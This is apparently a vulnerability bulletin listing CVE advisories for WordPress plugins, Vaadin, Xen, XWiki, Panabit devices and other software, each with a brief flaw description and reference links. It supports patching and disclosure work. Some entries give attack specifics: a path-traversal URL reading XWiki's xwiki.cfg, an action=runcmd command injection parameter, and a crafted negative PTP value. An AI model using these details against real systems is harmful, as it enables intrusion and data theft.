Unknown–Autoptimize The Autoptimize WordPress plugin before 3.1.15, Clearfy Cache WordPress plugin before 2.4.2, Speed Optimizer WordPress plugin before 7.7.9 are vulnerable to unauthenticated Stored Cross-Site Scripting (XSS) due to a predictable replacement hash used during the HTML minification process and abusing a regular expression. This allows an attacker to inject arbitrary HTML attributes in the final HTML output by anticipating the placeholder format. 2026-05-18 not yet calculated CVE-2026-3220 https://wpscan.com/vulnerability/3ceabf11-23cd-4c38-ba14-014348b0ff2d/
 
Unknown–Decent Comments The Decent Comments WordPress plugin before 3.0.2 does not restrict access to comment author email addresses and post author email addresses via its REST API endpoint, allowing unauthenticated attackers to enumerate registered user email addresses. 2026-05-20 not yet calculated CVE-2026-7385 https://wpscan.com/vulnerability/1c5949d0-cf50-45d3-a7e2-2f94cdb42405/
 
Unknown–Email Encoder The Email Encoder WordPress plugin before 2.4.7 does not escape email addresses retrieved via user input, allowing unauthenticated attackers to perform Stored XSS attacks. 2026-05-20 not yet calculated CVE-2026-5776 https://wpscan.com/vulnerability/00c0b9f7-c559-463e-80ae-97d99e0ef99f/
 
Unknown–Feeds for YouTube (YouTube video, channel, and gallery plugin) The Feeds for YouTube (YouTube video, channel, and gallery plugin) WordPress plugin before 2.6.4 is vulnerable to unauthorized modification of its license key due to a missing capability check on the ‘actions’ function. This makes it possible for subscribers and above to delete the license key. 2026-05-18 not yet calculated CVE-2026-1631 https://wpscan.com/vulnerability/b19596c2-69bc-4e15-8632-eb80f4577e3c/
 
Unknown–Fortis for WooCommerce The Fortis for WooCommerce WordPress plugin before 1.3.1 may leak sensitive API keys to unauthenticated attackers, allowing them to query Fortis’ API and retrieve sensitive customer information, like past orders, PII, etc. 2026-05-19 not yet calculated CVE-2025-15609 https://wpscan.com/vulnerability/220f72ea-e3b4-44c9-8c9b-15662aebb6cb/
 
Unknown–WP Maps The WP Maps WordPress plugin before 4.9.3 does not properly sanitize a parameter before using it in a file path, allowing authenticated users to perform Local File Inclusion attacks. 2026-05-18 not yet calculated CVE-2026-6381 https://wpscan.com/vulnerability/18b36672-58d7-44fa-b653-b728e9ef257a/
 
Unknown–WP Photo Album Plus The WP Photo Album Plus WordPress plugin before 9.1.11.001 does not properly sanitize and escape a parameter before using it in a SQL query, allowing unauthenticated users to perform SQL injection attacks. 2026-05-18 not yet calculated CVE-2026-6379 https://wpscan.com/vulnerability/60b88fd2-4048-4773-b319-63caaf5bd8eb/
 
vaadin–flow A possible information disclosure vulnerability exists in the Vaadin Maven plugin and Vaadin Gradle plugin that exposes the full set of environment variables in build logs whenever the frontend build process exits with a non-zero status. Because the build environment may contain credentials supplied as secrets, any failed frontend build can expose those secrets in clear text in CI logs and archived build artifacts. Users of affected versions should apply the following mitigation or upgrade. Releases that have fixed this issue include:
Product version | Mitigation
Vaadin 23.0.0 – 23.6.9 | Upgrade to 23.6.10
Vaadin 24.0.0 – 24.9.16 | Upgrade to 24.9.17 or newer
Vaadin 24.10.0 – 24.10.3 | Upgrade to 24.10.4 or newer
Vaadin 25.0.0 – 25.0.10 | Upgrade to 25.0.11 or newer
Vaadin 25.1.0 – 25.1.4 | Upgrade to 25.1.5 or newer
Please note that Vaadin versions 10-13 and 15-22 are no longer supported and you should update either to the latest 23, 24, or 25 version.
Artifacts:
Maven coordinates | Vulnerable versions | Fixed version
com.vaadin:flow-plugin-base | 23.0.0 – 23.6.10 | ≥23.6.11
com.vaadin:flow-plugin-base | 24.0.0 – 24.9.17 | ≥24.9.18
com.vaadin:flow-plugin-base | 24.10.0 – 24.10.3 | ≥24.10.4
com.vaadin:flow-plugin-base | 25.0.0 – 25.0.11 | ≥25.0.12
com.vaadin:flow-plugin-base | 25.1.0 – 25.1.4 | ≥25.1.5
com.vaadin:flow-maven-plugin | 23.0.0 – 23.6.10 | ≥23.6.11
com.vaadin:flow-maven-plugin | 24.0.0 – 24.9.17 | ≥24.9.18
com.vaadin:flow-maven-plugin | 24.10.0 – 24.10.3 | ≥24.10.4
com.vaadin:flow-maven-plugin | 25.0.0 – 25.0.11 | ≥25.0.12
com.vaadin:flow-maven-plugin | 25.1.0 – 25.1.4 | ≥25.1.5
com.vaadin:flow-gradle-plugin | 24.0.0 – 24.9.17 | ≥24.9.18
com.vaadin:flow-gradle-plugin | 24.10.0 – 24.10.3 | ≥24.10.4
com.vaadin:flow-gradle-plugin | 25.0.0 – 25.0.11 | ≥25.0.12
com.vaadin:flow-gradle-plugin | 25.1.0 – 25.1.4 | ≥25.1.5
2026-05-19 not yet calculated CVE-2026-7860 https://vaadin.com/security/cve-2026-7860
https://github.com/vaadin/flow/pull/24219
 
vifm–vifm vifm is vulnerable to a heap buffer overflow during the history merge process when saving the state file (vifminfo.json). This flaw occurs because the application lacks a runtime check on the length of history entries in release builds, potentially allowing a crafted long path or command in the history to cause memory corruption or application crashes. Releases from 0.12.1 to 0.14.3 (inclusive) are considered vulnerable. This issue was fixed in commit 23063c7. 2026-05-22 not yet calculated CVE-2026-8997 https://cert.pl/en/posts/2026/05/CVE-2026-8997
https://github.com/vifm/vifm/commit/23063c741f15a85621fd232dfc3ac5b779f6910d
 
WineHQ–Wine Wine ships a .desktop file that registers itself as a MIME handler for EXE files and several other Windows executable file types. In some configurations, handling of an EXE file causes that file to be blindly executed with the permissions of the invoker. This allows escaping Flatpak and Snap sandboxes, because MIME handlers are not intended for use by code interpreters and loaders. NOTE: some parties feel that this is not a bug to be addressed in Wine, because there is no known solution that avoids a severe loss of usability (Wine could be a binfmt-misc handler, but binfmt-misc does not exist on all platforms supported by Wine). 2026-05-24 not yet calculated CVE-2026-48831 https://bugs.winehq.org/show_bug.cgi?id=59767
https://www.openwall.com/lists/oss-security/2026/05/19/1
 
Xen–Xen Any guest can cause xenstored to crash by issuing a XS_RESET_WATCHES command within a transaction, due to an assert() triggering. If xenstored was built with NDEBUG #defined, nothing bad will happen, as assert() does nothing in that case. Note that the default is not to define NDEBUG for xenstored builds, even in release builds of Xen. 2026-05-19 not yet calculated CVE-2026-23557 https://xenbits.xenproject.org/xsa/advisory-484.html
 
Xen–Xen The adjustments made for XSA-379 as well as those subsequently becoming XSA-387 still left a race window, when a HVM or PVH guest does a grant table version change from v2 to v1 in parallel with mapping the status page(s) via XENMEM_add_to_physmap. Some of the status pages may then be freed while mappings of them would still be inserted into the guest’s secondary (P2M) page tables. 2026-05-19 not yet calculated CVE-2026-23558 https://xenbits.xenproject.org/xsa/advisory-486.html
 
xwiki–xwiki-commons XWiki Platform is a generic wiki platform. Versions prior to 18.1.0-rc-1, 17.10.3, 17.4.9, and 16.10.17 allow access to read configuration files by using URLs such as http://localhost:8080/bin/ssx/Main/WebHome?resource=/../../WEB-INF/xwiki.cfg&minify=false, leading to Path Traversal. The vulnerability can be exploited via the resource parameter of the ssx and jsx endpoints by using leading slashes. This issue has been patched in 18.1.0-rc-1, 17.10.3, 17.4.9, 16.10.17. 2026-05-20 not yet calculated CVE-2026-23734 https://github.com/xwiki/xwiki-commons/security/advisories/GHSA-xq3r-2qv5-vqqm
https://github.com/xwiki/xwiki-commons/commit/a979cafd89f6a9c9c0b9ab19744d672df64429bf
https://jira.xwiki.org/browse/XCOMMONS-3547
 
xwiki–xwiki-platform XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions prior to 18.1.0-rc-1, 17.10.3, 17.4.9, and 16.10.17, the POST /wikis/{wikiName} API executes a XAR import without performing any authentication or authorization checks, allowing an unauthenticated attacker to create or update documents in the target wiki. This vulnerability has been patched in XWiki 16.10.17, 17.4.9, 17.10.3, 18.0.1 and 18.1.0-rc-1. 2026-05-20 not yet calculated CVE-2026-33137 https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-qrvh-r3f2-9h4r
https://github.com/xwiki/xwiki-platform/commit/4b7b95b79256374d487e9ece1dc48f527966990f
https://jira.xwiki.org/browse/XWIKI-23953
 
Zenshin–hitarth-gg An OS command injection vulnerability in the /stream-to-vlc Express route in hitarth-gg Zenshin before 2.7.0 allows remote attackers to execute arbitrary commands via the url parameter. 2026-05-19 not yet calculated CVE-2026-37281 https://github.com/hitarth-gg/zenshin
https://github.com/hitarth-gg/zenshin/commit/7d31c6edfbac978f0ad44c66d761bab9dcd2fa27
https://gist.github.com/MitruStefan/cf016709252aabbec7f95b7a70e0cfba
 
zephyrproject-rtos–Zephyr A bitwise shift vulnerability in Zephyr’s PTP subsystem allows a remote attacker to cause undefined behavior and potential system crashes. An attacker sends a crafted PTP_MSG_MANAGEMENT message to set an unvalidated negative log_announce_interval value in the port’s data set. When a subsequent PTP_MSG_ANNOUNCE message is processed, port_timer_set_timeout_random computes a timeout as NSEC_PER_SEC >> -log_seconds; if the attacker-supplied value is sufficiently negative (e.g., -127), the shift amount exceeds the 64-bit integer width, triggering undefined behavior in C. This can cause a system crash via a compiler-generated illegal instruction trap on some architectures, or produce an erroneous zero timeout leading to resource starvation loops or other logical errors. 2026-05-22 not yet calculated CVE-2026-5072 https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-3v98-458v-388r
 
LalanaChami–Pharmacy Management System API endpoints in LalanaChami Pharmacy Management System (commit 5c3d028) lack authentication middleware. Unauthenticated remote attackers can exploit this to dump all user records (including bcrypt password hashes) via /api/user/getUserData, modify drug inventory, and access private medical prescription data via /api/doctorOder. 2026-05-19 not yet calculated CVE-2026-31071 https://github.com/LalanaChami/Pharmacy-Mangment-System/tree/5c3d02888631166649856f71d542387114b3010b/backend/routes
https://gist.github.com/nedlir/bc8ad4693c53256819280e8f5de49286
 
Panabit–PAP-XM320 A command injection vulnerability exists in Panabit PAP-XM320 up to and including V7.7. The web management interface invokes the backend helper /usr/sbin/pappiw and passes user-controlled parameters to it. The helper performs unsafe argument processing using eval, which allows command injection when attacker-controlled input is included in the arguments. As a result, an authenticated remote attacker with access to the management interface may execute arbitrary shell commands. 2026-05-19 not yet calculated CVE-2026-36827 https://www.panabit.com/
https://secreu.notion.site/CVE-2026-36827-3652c0ab46158036a888ef4a12b104bf
 
Panabit–PAP-XM320 A command injection vulnerability exists in the /cgi-bin/tools/ajax_cmd endpoint of Panabit PAP-XM320 up to and including v7.7. The CGI component allows authenticated users to execute arbitrary shell commands with root privileges via the action=runcmd parameter. 2026-05-19 not yet calculated CVE-2026-36828 https://www.panabit.com/
https://secreu.notion.site/CVE-2026-36828-3652c0ab461580f28f50ddc37ce4e1d6
 
Panabit–PAP-XM320 An authentication bypass vulnerability exists in the embedded HTTP server of Panabit PAP-XM320 up to and including v7.7. The server validates session cookies using a filesystem existence check based on a user-controlled cookie value without proper sanitization, allowing directory traversal and bypass of authentication. 2026-05-19 not yet calculated CVE-2026-36829 https://www.panabit.com/
https://secreu.notion.site/CVE-2026-36829-3652c0ab461580e19704e87b18865714
 
Uncrustify–Uncrustify A buffer overflow vulnerability in the Uncrustify project, affecting version Uncrustify_d-0.82.0-132-bcc41cbdc and fixed in commit 68e67b9a1435a1bb173b106fedb4a4f510972bdc, allows a local attacker to cause a denial of service via the check_template function in check_template.cpp, the tokenize_cleanup function, and the uncrustify executable components. 2026-05-21 not yet calculated CVE-2026-36189 https://github.com/uncrustify/uncrustify
https://github.com/uncrustify/uncrustify/issues/4636
https://github.com/uncrustify/uncrustify/pull/4641
https://gist.github.com/Criticayon/5da6d6c9cf068e494347c659d01982a9
 